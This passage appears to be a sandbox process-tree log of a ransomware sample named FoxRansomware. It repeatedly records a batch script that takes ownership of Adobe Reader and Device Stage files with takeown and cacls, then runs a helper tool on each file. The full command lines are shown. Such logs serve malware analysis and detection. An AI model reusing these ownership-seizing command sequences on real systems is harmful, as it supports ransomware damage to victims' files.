  [3] C:\Windows\SysWOW64\cmd.exe (PID 3676)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "superbar.png" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 968)
        sOCkujKF.exe -accepteula "superbar.png" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1708)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 4036)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 3384)
      cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 2192)
      takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"
      - Modifies file permissions
  [3] C:\Windows\SysWOW64\cmd.exe (PID 3436)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3544)
        sOCkujKF.exe -accepteula "resource.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1356)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 3888)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 4180)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 3328)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"
      - Modifies file permissions
  [3] C:\Windows\SysWOW64\cmd.exe (PID 2676)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "cryptocme2.sig" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3928)
        sOCkujKF.exe -accepteula "cryptocme2.sig" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3180)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 880)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 3296)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 3268)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"
      - Modifies file permissions
  [3] C:\Windows\SysWOW64\cmd.exe (PID 2800)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "pmd.cer" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1068)
        sOCkujKF.exe -accepteula "pmd.cer" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3324)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 1580)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 3104)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 3084)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 2348)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "email_initiator.gif" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 2988)
        sOCkujKF.exe -accepteula "email_initiator.gif" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3364)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 4100)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 2752)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 2084)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"
      - Modifies file permissions
  [3] C:\Windows\SysWOW64\cmd.exe (PID 1180)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "pdf.gif" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1760)
        sOCkujKF.exe -accepteula "pdf.gif" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4148)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 668)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 3316)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 2888)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"
      - Modifies file permissions
  [3] C:\Windows\SysWOW64\cmd.exe (PID 2124)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "server_issue.gif" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3152)
        sOCkujKF.exe -accepteula "server_issue.gif" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 2724)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 2780)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 2708)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 3572)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"
      - Modifies file permissions
  [3] C:\Windows\SysWOW64\cmd.exe (PID 3804)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 896)
        sOCkujKF.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4084)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 4032)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 4128)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 3684)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 2180)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CourierStd.otf" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 2764)
        sOCkujKF.exe -accepteula "CourierStd.otf" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3236)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 2072)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 2992)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 3780)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 3272)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "zx______.pfm" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 2012)
        sOCkujKF.exe -accepteula "zx______.pfm" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3420)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 2128)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 1820)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 3100)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 2896)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3076)
        sOCkujKF.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1704)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 3440)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 3796)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 1008)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"
      - Modifies file permissions
  [3] C:\Windows\SysWOW64\cmd.exe (PID 3160)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "can32.clx" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 2100)
        sOCkujKF.exe -accepteula "can32.clx" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4024)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 2400)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 1468)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 4212)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 2584)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "symbol.txt" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3164)
        sOCkujKF.exe -accepteula "symbol.txt" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4220)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 4276)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 4304)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 3340)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 4328)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "SYMBOL.TXT" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4300)
        sOCkujKF.exe -accepteula "SYMBOL.TXT" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4272)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 4416)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 4392)
      cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 4376)
      takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 3772)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "watermark.png" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4396)
        sOCkujKF.exe -accepteula "watermark.png" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3344)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 4452)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 4468)
      cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 4524)
      takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 4512)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4440)
        sOCkujKF.exe -accepteula "resource.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4432)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 1040)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 4584)
      cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 820)
      takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 4636)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4660)
        sOCkujKF.exe -accepteula "resource.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4652)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 4700)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 4352)
      cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 4696)
      takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"
      - Modifies file permissions
  [3] C:\Windows\SysWOW64\cmd.exe (PID 4484)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4760)
        sOCkujKF.exe -accepteula "resource.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4752)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 4628)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 4676)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 2212)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"
      - Modifies file permissions
  [3] C:\Windows\SysWOW64\cmd.exe (PID 4724)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "br.gif" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4888)
        sOCkujKF.exe -accepteula "br.gif" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1116)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 4800)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 4824)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 564)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"
      - Modifies file permissions
  [3] C:\Windows\SysWOW64\cmd.exe (PID 4928)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "form_responses.gif" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4836)
        sOCkujKF.exe -accepteula "form_responses.gif" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4936)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 3500)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 4984)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 2592)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 5024)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "review_email.gif" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 5016)
        sOCkujKF.exe -accepteula "review_email.gif" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4832)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 5000)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 4988)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 4900)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"
      - Modifies file permissions
  [3] C:\Windows\SysWOW64\cmd.exe (PID 5020)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "tr.gif" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 5112)
        sOCkujKF.exe -accepteula "tr.gif" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 5012)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 5080)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 5052)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 4876)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 4968)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "AdobePiStd.otf" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3996)
        sOCkujKF.exe -accepteula "AdobePiStd.otf" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 864)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 3276)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 5084)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 1528)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 2404)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3932)
        sOCkujKF.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3200)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 4940)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 3868)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 3664)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 572)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3748)
        sOCkujKF.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 2464)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 2468)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 1748)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 2112)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 3984)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "can.fca" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3992)
        sOCkujKF.exe -accepteula "can.fca" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1440)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 520)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 1492)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 1532)
